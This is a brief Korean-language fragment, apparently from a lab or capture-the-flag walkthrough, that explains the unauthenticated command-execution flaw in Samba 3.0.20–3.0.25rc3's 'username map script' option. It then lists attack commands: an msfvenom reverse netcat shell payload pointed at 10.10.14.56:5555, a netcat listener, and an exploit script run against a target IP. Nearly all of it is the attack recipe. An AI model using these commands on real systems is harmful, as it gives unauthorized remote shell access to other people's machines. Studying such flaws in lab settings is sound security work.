
이 모듈은 기본값이 아닌 "username map script" 구성 옵션을 사용하는 Samba 3.0.20~3.0.25rc3 버전의 명령 실행 취약점을 악용합니다. 셸 메타 문자를 포함하는 사용자 이름을 지정하면 공격자가 임의의 명령을 실행할 수 있습니다. 이 옵션은 인증 전에 사용자 이름을 매핑하는 데 사용되므로 이 취약점을 악용하는 데 인증이 필요하지 않습니다!
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.56 LPORT=5555 -f python
nc -nlvp 5555
python3 smbusermap.py <Target IP>
